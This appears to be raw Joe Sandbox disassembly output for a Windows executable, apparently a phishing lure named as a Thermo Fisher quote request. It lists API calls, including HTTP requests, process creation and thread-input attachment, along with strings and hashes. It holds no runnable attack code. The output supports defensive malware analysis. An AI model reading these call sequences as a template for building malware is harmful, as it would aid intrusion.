                                                              • GetParent.USER32 ref: 0063BA9A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0063BA9D
                                                              • GetDlgCtrlID.USER32(?), ref: 0063BAA6
                                                              • GetParent.USER32(?), ref: 0063BAC2
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0063BAC5
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              APIs
                                                              • GetParent.USER32 ref: 0063BAE3
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 0063BAF8
                                                              • _wcscmp.LIBCMT ref: 0063BB0A
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0063BB85
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0065B2D5
                                                              • CoInitialize.OLE32(00000000), ref: 0065B302
                                                              • CoUninitialize.OLE32 ref: 0065B30C
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0065B40C
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0065B539
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0065B56D
                                                              • CoGetObject.OLE32(?,00000000,0068D91C,?), ref: 0065B590
                                                              • SetErrorMode.KERNEL32(00000000), ref: 0065B5A3
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0065B623
                                                              • VariantClear.OLEAUT32(0068D91C), ref: 0065B633
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              APIs
                                                              • __lock.LIBCMT ref: 0062ACC1
                                                                • Part of subcall function 00627CF4: __mtinitlocknum.LIBCMT ref: 00627D06
                                                                • Part of subcall function 00627CF4: EnterCriticalSection.KERNEL32(00000000,?,00627ADD,0000000D), ref: 00627D1F
                                                              • __calloc_crt.LIBCMT ref: 0062ACD2
                                                                • Part of subcall function 00626986: __calloc_impl.LIBCMT ref: 00626995
                                                                • Part of subcall function 00626986: Sleep.KERNEL32(00000000,000003BC,0061F507,?,0000000E), ref: 006269AC
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0062ACED
                                                              • GetStartupInfoW.KERNEL32(?,006B6E28,00000064,00625E91,006B6C70,00000014), ref: 0062AD46
                                                              • __calloc_crt.LIBCMT ref: 0062AD91
                                                              • GetFileType.KERNEL32(00000001), ref: 0062ADD8
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0062AE11
                                                              Similarity
                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1426640281-0
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00644047
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006430A5,?,00000001), ref: 0064405B
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00644062
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006430A5,?,00000001), ref: 00644071
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00644083
                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006430A5,?,00000001), ref: 0064409C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006430A5,?,00000001), ref: 006440AE
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006430A5,?,00000001), ref: 006440F3
                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006430A5,?,00000001), ref: 00644108
                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006430A5,?,00000001), ref: 00644113
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0061B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0061B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0061B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0061B4BD
                                                              • GetClientRect.USER32(?), ref: 0067DD63
                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0067DD7A
                                                              • GetWindowDC.USER32(?), ref: 0067DD86
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0067DD95
                                                              • ReleaseDC.USER32(?,00000000), ref: 0067DDA7
                                                              • GetSysColor.USER32(00000005), ref: 0067DDC5
                                                              Similarity
                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                              • String ID:
                                                              • API String ID: 3430376129-0
                                                              • Opcode ID: b8feb626c6475b2fd46a7375690fd7ca0d45772d8934b877787f6b5b73562f74
                                                              • Instruction ID: 5e5d0ae4e838018077906b256073189f897ed773cbbe9489d08ae193bc94e44a
                                                              • Opcode Fuzzy Hash: b8feb626c6475b2fd46a7375690fd7ca0d45772d8934b877787f6b5b73562f74
                                                              • Instruction Fuzzy Hash: 36114931500205FFDB216BA4EC08FE97BB3EF05325F149725FA6A951E2DB310981EB21
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006030DC
                                                              • CoUninitialize.OLE32(?,00000000), ref: 00603181
                                                              • UnregisterHotKey.USER32(?), ref: 006032A9
                                                              • DestroyWindow.USER32(?), ref: 00675079
                                                              • FreeLibrary.KERNEL32(?), ref: 006750F8
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00675125
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: b179a17be18000923ed9b5a74526ef39f8d557517ebe452d13a9d6ed30eeb316
                                                              • Instruction ID: ad71a55018a3f9000af8282aeb12964c10bcff2d01da67e4faf4b26535140503
                                                              • Opcode Fuzzy Hash: b179a17be18000923ed9b5a74526ef39f8d557517ebe452d13a9d6ed30eeb316
                                                              • Instruction Fuzzy Hash: 45914F706401129FC759EF14C895AAAF3AAFF04305F5482EDE50A673A2DF30AE56CF58
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0061CC15
                                                                • Part of subcall function 0061CCCD: GetClientRect.USER32(?,?), ref: 0061CCF6
                                                                • Part of subcall function 0061CCCD: GetWindowRect.USER32(?,?), ref: 0061CD37
                                                                • Part of subcall function 0061CCCD: ScreenToClient.USER32(?,?), ref: 0061CD5F
                                                              • GetDC.USER32 ref: 0067D137
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0067D14A
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0067D158
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0067D16D
                                                              • ReleaseDC.USER32(?,00000000), ref: 0067D175
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0067D200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: 04d34add9f4325bc4bfcfaec889e892b409c2400805c5e2ca08f31d0b57b6bd6
                                                              • Instruction ID: 971bcadabc8eafc974b060328f488700284609d05b59dbbf066ccc17430cf387
                                                              • Opcode Fuzzy Hash: 04d34add9f4325bc4bfcfaec889e892b409c2400805c5e2ca08f31d0b57b6bd6
                                                              • Instruction Fuzzy Hash: DA71E530400205DFCF21DF64C885AE97BB7FF49324F189A69ED599A2A6C7318C81DF60
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                                • Part of subcall function 0061B63C: GetCursorPos.USER32(000000FF), ref: 0061B64F
                                                                • Part of subcall function 0061B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0061B66C
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000001), ref: 0061B691
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000002), ref: 0061B69F
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0066ED3C
                                                              • ImageList_EndDrag.COMCTL32 ref: 0066ED42
                                                              • ReleaseCapture.USER32 ref: 0066ED48
                                                              • SetWindowTextW.USER32(?,00000000), ref: 0066EDF0
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0066EE03
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0066EEDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                              • API String ID: 1924731296-2107944366
                                                              • Opcode ID: 8b7e164bffd10344c33027803569e77bb7107c173dd7fa39ebe503e01522a729
                                                              • Instruction ID: c3f9871477fe1793460dd1cb6ec4366bd8b701b0008c8679825b77f0e11cc4f4
                                                              • Opcode Fuzzy Hash: 8b7e164bffd10344c33027803569e77bb7107c173dd7fa39ebe503e01522a729
                                                              • Instruction Fuzzy Hash: CD51CB74204300AFD704EF20CC9AFAA77E6FB89714F004A1DF5959B2E2DB719954CB52
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006545FF
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0065462B
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0065466D
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00654682
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0065468F
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006546BF
                                                              • InternetCloseHandle.WININET(00000000), ref: 00654706
                                                                • Part of subcall function 00655052: GetLastError.KERNEL32(?,?,006543CC,00000000,00000000,00000001), ref: 00655067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 1241431887-3916222277
                                                              • Opcode ID: a0e92849d163ac3d411749217dfe5fef47242275bec597a7f6ecfd91370513a8
                                                              • Instruction ID: ebe92a96d449a65d86dbca56e186433df8c0c2441192817318f7f49b5ecd0e31
                                                              • Opcode Fuzzy Hash: a0e92849d163ac3d411749217dfe5fef47242275bec597a7f6ecfd91370513a8
                                                              • Instruction Fuzzy Hash: B54171B1501205BFEB019F50CC89FFB77AEFF09359F00415AFE059A185DB7099898BA4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0069DC00), ref: 0065B715
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0069DC00), ref: 0065B749
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0065B8C1
                                                              • SysFreeString.OLEAUT32(?), ref: 0065B8EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: bc06d33ab69a11f2c17b414b6bca117ffaa8a590537890b77f15411b1b69dc5a
                                                              • Instruction ID: f70ccb166756d89e566b10354efbd592d5161437f83021c92cd9ab0f37677852
                                                              • Opcode Fuzzy Hash: bc06d33ab69a11f2c17b414b6bca117ffaa8a590537890b77f15411b1b69dc5a
                                                              • Instruction Fuzzy Hash: A7F11971A00209EFCF04DF94C884EAEB7BAFF49315F109559F905AB250DB31AE46CB50
                                                              APIs
                                                              • _memset.LIBCMT ref: 006624F5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00662688
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006626AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006626EC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0066270E
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0066286F
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006628A1
                                                              • CloseHandle.KERNEL32(?), ref: 006628D0
                                                              • CloseHandle.KERNEL32(?), ref: 00662947
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: c66019b5926e2fc1cef03ba6df7697ab6bef4022213e04d594dea6bda3b71394
                                                              • Instruction ID: 423714ce92828be50f8be8f0c6d42791003e45c2f7bfae2cbacc678282c4ef10
                                                              • Opcode Fuzzy Hash: c66019b5926e2fc1cef03ba6df7697ab6bef4022213e04d594dea6bda3b71394
                                                              • Instruction Fuzzy Hash: F8D1B131604601DFCB54EF24C8A1AAEBBE6BF85310F18855DF8899B3A2DB31DC45CB56
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0066B3F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 43a79e9d321bded1dc480c1b4e23e83d827895acc7122f477b9baee01c4f36bc
                                                              • Instruction ID: f2415add5e253e449243be741e56861c67b963dc73069dd27c8d885dc6739ffe
                                                              • Opcode Fuzzy Hash: 43a79e9d321bded1dc480c1b4e23e83d827895acc7122f477b9baee01c4f36bc
                                                              • Instruction Fuzzy Hash: 54517C31600208FBEF209F298C85BE97BA7AB05324F646115F615E63E2DB71E9D08B55
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0067DB1B
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0067DB3C
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0067DB51
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0067DB6E
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0067DB95
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0061A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0067DBA0
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0067DBBD
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0061A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0067DBC8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                              • String ID:
                                                              • API String ID: 1268354404-0
                                                              • Opcode ID: ffdfc739674e807853b5d71322cb2588ac20ccf400bea5f71c60155bcbb37060
                                                              • Instruction ID: 206ebf51cd9ab3e813aecf0742d279287d167c2ef4710b10c3076d1e25862e6e
                                                              • Opcode Fuzzy Hash: ffdfc739674e807853b5d71322cb2588ac20ccf400bea5f71c60155bcbb37060
                                                              • Instruction Fuzzy Hash: D2518A74600208EFDB20DF69CC91FEA77BAAF49750F144619F94A9B2D1D7B0AD90CB50
                                                              APIs
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00645FA6,?), ref: 00646ED8
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00645FA6,?), ref: 00646EF1
                                                                • Part of subcall function 006472CB: GetFileAttributesW.KERNEL32(?,00646019), ref: 006472CC
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 006475CA
                                                              • _wcscmp.LIBCMT ref: 006475E2
                                                              • MoveFileW.KERNEL32(?,?), ref: 006475FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: 404cb2e9a92e4358765c32f41e51edd93cd57c8afde12cd8d2cfb234c11e3ac0
                                                              • Instruction ID: 7c41d38c3c5702716b47b3106b24b3ae9821c5e77556abd3c7c91a6d83ab5bdc
                                                              • Opcode Fuzzy Hash: 404cb2e9a92e4358765c32f41e51edd93cd57c8afde12cd8d2cfb234c11e3ac0
                                                              • Instruction Fuzzy Hash: AD5132B2A092299BDF94EB94E8419DE73BE9F08310B0041AEFA05E3141EB74D7C5CF64
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0061EAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0061EB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0067DC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0067DAD1,00000004,00000000,00000000), ref: 0067DCF2
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 8e503b0c0731b3b5af81d7885feae9ae65f53187098f986c9d09c5df34118b43
• Instruction ID: 227b26124d879ec907d9d5d7190cbe43ad249accfb251c1208f0f99faf5a6cc6
• Opcode Fuzzy Hash: 8e503b0c0731b3b5af81d7885feae9ae65f53187098f986c9d09c5df34118b43
• Instruction Fuzzy Hash: F941E97020D680ABD73547288B8DAFA7BABAF42314F1D580DF44B867A1D672F8C1D321
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0063AEF1,00000B00,?,?), ref: 0063B26C
• HeapAlloc.KERNEL32(00000000,?,0063AEF1,00000B00,?,?), ref: 0063B273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0063AEF1,00000B00,?,?), ref: 0063B288
• GetCurrentProcess.KERNEL32(?,00000000,?,0063AEF1,00000B00,?,?), ref: 0063B290
• DuplicateHandle.KERNEL32(00000000,?,0063AEF1,00000B00,?,?), ref: 0063B293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0063AEF1,00000B00,?,?), ref: 0063B2A3
• GetCurrentProcess.KERNEL32(0063AEF1,00000000,?,0063AEF1,00000B00,?,?), ref: 0063B2AB
• DuplicateHandle.KERNEL32(00000000,?,0063AEF1,00000B00,?,?), ref: 0063B2AE
• CreateThread.KERNEL32(00000000,00000000,0063B2D4,00000000,00000000,00000000), ref: 0063B2C8
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 396e871a6f62d14521230942e58581da0e7c64327d3590b11fce0ef15d929334
• Instruction ID: 0f3f7d2f9cf971e02fd66eb8989d4553fdf3d39e79a658b977286f9db19850f0
• Opcode Fuzzy Hash: 396e871a6f62d14521230942e58581da0e7c64327d3590b11fce0ef15d929334
• Instruction Fuzzy Hash: C001B6B5240308BFE710ABA5EC8DF6B7BADEB89711F019511FA05DB1E1CA759800CB71
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: c88eee54591a5ab0836b37ef23fee21459be29e79850c5158240b971d51770c6
• Instruction ID: ee2dae52c66faa5f6719848ef0f13e38c93e3271295f811015c774bfd6243bd2
• Opcode Fuzzy Hash: c88eee54591a5ab0836b37ef23fee21459be29e79850c5158240b971d51770c6
• Instruction Fuzzy Hash: AFE1A171A00319AFDF14DFA4C881AEE77B6EF48325F144129ED05AB381E770AD49CBA4
APIs
  • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
  • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
  • Part of subcall function 0061C6F4: _wcscpy.LIBCMT ref: 0061C717
• _wcstok.LIBCMT ref: 0065184E
• _wcscpy.LIBCMT ref: 006518DD
• _memset.LIBCMT ref: 00651910
Strings
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X$p2kl2k
• API String ID: 774024439-2452251221
• Opcode ID: d65d66e45d30ee0f9bd39a8aeaff125ee61195cea0e738534dce9b72b11a0491
• Instruction ID: 45fa0696bea1ad4ae5672efc6561d12fc7c7e7406db099bcfc975c66557c5c3e
• Opcode Fuzzy Hash: d65d66e45d30ee0f9bd39a8aeaff125ee61195cea0e738534dce9b72b11a0491
• Instruction Fuzzy Hash: 56C1A2705043419FC768EF24C891A9BB7E6BF45350F004A6DF9899B3A2DB70ED05CB86
APIs
Strings
Similarity
• API ID: _memset
• String ID: Q\E$[$\$\$]$^
• API String ID: 2102423945-1026548749
• Opcode ID: 50f88e2971df99350cbb9cb2cf61846fbfae173f40e31b78928808fd3d38e554
• Instruction ID: 4aef927a2dbe4a4ff90206834a5bd0eb928d218612f0d5b0492a47c63e57ec7d
• Opcode Fuzzy Hash: 50f88e2971df99350cbb9cb2cf61846fbfae173f40e31b78928808fd3d38e554
• Instruction Fuzzy Hash: D5517171D402099FDF28CF98C8817EEB7B3EF94314F24816AD858A7391E770AD858B85
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00669B19
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00669B2D
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00669B47
• _wcscat.LIBCMT ref: 00669BA2
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00669BB9
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00669BE7
Strings
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: b23154f31aa061fd643e0a8cd0dafa7ebbd42dfddff87cde6327c2941c93b6ee
• Instruction ID: b3a38d4bd75e16c636d1e8ed07c561ba81777025d94849da9e3f41bc334be7c4
